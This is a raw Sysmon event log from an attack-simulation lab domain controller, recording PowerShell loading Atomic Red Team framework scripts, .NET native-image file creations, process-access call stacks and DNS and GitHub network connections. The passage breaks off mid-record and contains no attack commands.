21:07:16.467{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\Invoke-AtomicTest.ps12021-06-23 21:07:16.467 10341000x800000000000000023600Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.467{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A284-60D3-CF05-00000000CF01}4516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023599Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.467{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A284-60D3-CF05-00000000CF01}4516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023598Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.451{4DB9351A-A284-60D3-CE05-00000000CF01}6912NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ATU8CYHQYZ\System.DirectoryServices.Protocols.ni.dll.auxMD5=63C97F5BCFB57F59E151F3A48D317038,SHA256=04A183FC6A76CB5C9ED089331078DDF90C061C8F71229DBD64F5FF12D3C9F98F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023597Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.451{4DB9351A-A284-60D3-CE05-00000000CF01}6912NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ATU8CYHQYZ\System.DirectoryServices.Protocols.ni.dllMD5=7F0AD07523FB560DDD8C740C5A3263AA,SHA256=3694D10ECAE89BBF076FDB803955CD7BA2D7AB081A29C1ABCF093084D1ED575E,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023596Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.420{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A284-60D3-CE05-00000000CF01}6912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000023595Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.405{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\Get-AtomicTechnique.ps12021-06-23 21:07:16.405 10341000x800000000000000023594Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.405{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A284-60D3-CE05-00000000CF01}6912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023593Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.405{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A284-60D3-CE05-00000000CF01}6912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023592Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.405{4DB9351A-A284-60D3-CD05-00000000CF01}4972NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5SP6GWT26G\System.DirectoryServices.AccountManagement.ni.dll.auxMD5=439982E562D779F9FDAA273A208643D5,SHA256=81859B10B9F512006DDCCB1D5FF369F828F9174F7F90281DB6EB9AA50D5EC648,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023591Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.389{4DB9351A-A284-60D3-CD05-00000000CF01}4972NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5SP6GWT26G\System.DirectoryServices.AccountManagement.ni.dllMD5=74DC02E54D9AA0C2F4AFB78B08FBAFBA,SHA256=F9A2CA3F2A84D95772E0B59EDB192EC68BB184160E3EDF674202C3DAECB1C548,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000023590Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.358{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Write-PrereqResults.ps12021-06-23 21:07:16.358 11241100x800000000000000023589Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.342{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Write-KeyValue.ps12021-06-23 21:07:16.342 11241100x800000000000000023588Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.326{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Write-ExecutionLog.ps12021-06-23 21:07:16.326 10341000x800000000000000023587Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.326{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A284-60D3-CD05-00000000CF01}4972C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000023586Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.311{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Show-Details.ps12021-06-23 21:07:16.311 10341000x800000000000000023585Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.295{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A284-60D3-CD05-00000000CF01}4972C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023584Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.295{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A284-60D3-CD05-00000000CF01}4972C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023583Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.295{4DB9351A-A284-60D3-CC05-00000000CF01}6588NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PLDT9UU0OW\System.Device.ni.dll.auxMD5=91268974447C9652C21C0301DF744F59,SHA256=BEDC2DA0FB7CDB7A220DC3881F14C0399EB9658FA4227C0B159B375D77273A7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023582Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.295{4DB9351A-A284-60D3-CC05-00000000CF01}6588NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PLDT9UU0OW\System.Device.ni.dllMD5=273AFAC764CF10D327DC962DAEE04562,SHA256=9A86F710BB68B6A32DC7E4879259A422FF66DB0F1E22EDCA206AA185D977706F,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000023581Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.280{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Replace-InputArgs.ps12021-06-23 21:07:16.280 10341000x800000000000000023580Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.280{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A284-60D3-CC05-00000000CF01}6588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000023579Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.264{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Invoke-Process.ps12021-06-23 21:07:16.264 10341000x800000000000000023578Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.264{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A284-60D3-CC05-00000000CF01}6588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023577Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.248{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A284-60D3-CC05-00000000CF01}6588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023576Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.248{4DB9351A-A283-60D3-CB05-00000000CF01}5712NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HF7D04A4RU\System.Design.ni.dll.auxMD5=67FC5E9EA70F42B9C8B9428D4A4F30CE,SHA256=066E3442C15FE68EA5DF04C6DA9078A48A392BD88E0BE44BD16C0C6B44A8DFBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023575Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.248{4DB9351A-A283-60D3-CB05-00000000CF01}5712NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HF7D04A4RU\System.Design.ni.dllMD5=F7F8E5647FEB8A3D94F58B420260444E,SHA256=04D83F05C18A74E6605F7E9DA36344D64D16190ADCF5DF988F60DA24293CD363,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000023574Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.217{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Invoke-KillProcessTree.ps12021-06-23 21:07:16.217 11241100x800000000000000023573Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.201{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Invoke-ExecuteCommand.ps12021-06-23 21:07:16.201 354300x800000000000000023572Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.094{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local57938- 354300x800000000000000023571Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.735{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61463-false185.199.109.133cdn-185-199-109-133.github.com443https 354300x800000000000000023570Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.717{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-663.attackrange.local61118-false10.0.0.2ip-10-0-0-2.us-west-2.compute.internal53domain 354300x800000000000000023569Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.717{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local58272- 11241100x800000000000000023568Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.186{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Invoke-CheckPrereqs.ps12021-06-23 21:07:16.186 11241100x800000000000000023567Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.155{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Get-TargetInfo.ps12021-06-23 21:07:16.155 11241100x800000000000000023566Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.139{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Get-PrereqExecutor.ps12021-06-23 21:07:16.139 11241100x800000000000000023565Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.123{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\AtomicClassSchema.ps12021-06-23 21:07:16.123 11241100x800000000000000023564Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.061{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\LICENSE.txt2021-06-23 21:07:16.061 23542300x800000000000000023701Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.905{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9181C8D699692D4E00EE7D76A77FCBE3,SHA256=01AC774E1C82E99201A9B9CC14CA43CE2E699643C5CED6AFA4B04BBAAC810B66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023700Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.873{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=92C0C1DCDB7CCF47162567EB6D373516,SHA256=446F38043280A10A01F5511092C962CDD8BC1C30348B794B5D1710BFC0C22760,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023699Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.811{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\wfh1mnqt.3brMD5=BD5BC210DA3DC6700837F7F1EF332861,SHA256=ADB9F280E68F8C8EF04510D25A7A31C547EEC0E828ABBCC0F9C7C0DF81A4D88A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023698Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.795{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\0tcddbzv.l0eMD5=59146FA8BBC0DEFDEA515CDE5D5CCB59,SHA256=6CC5CA22678B2300286AC6451FD66A3245F0153013430D899448DFC2A1E51291,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023697Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.780{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=79A89A627F68DD7EDCD87210C3987078,SHA256=26FF007B958262B982C4A568465183DAC9AE805171755F5B7891494C0098C4D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023696Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.780{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\g5ahye3h.g2eMD5=26C50195ABBFDE6611A4CAEE3585960B,SHA256=B2915EDDDBD8029336C3933115B8D8E9471FB63039177901606C5D101770E059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023695Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.733{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\ka2ulej4.lptMD5=D35B8C04DA801DE749B12D5DA8A0B9A0,SHA256=9CB8C56FA40380069256C24AB816BFD0E08201E16B654BD76D0EC0608DC1CCE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023694Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.592{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program 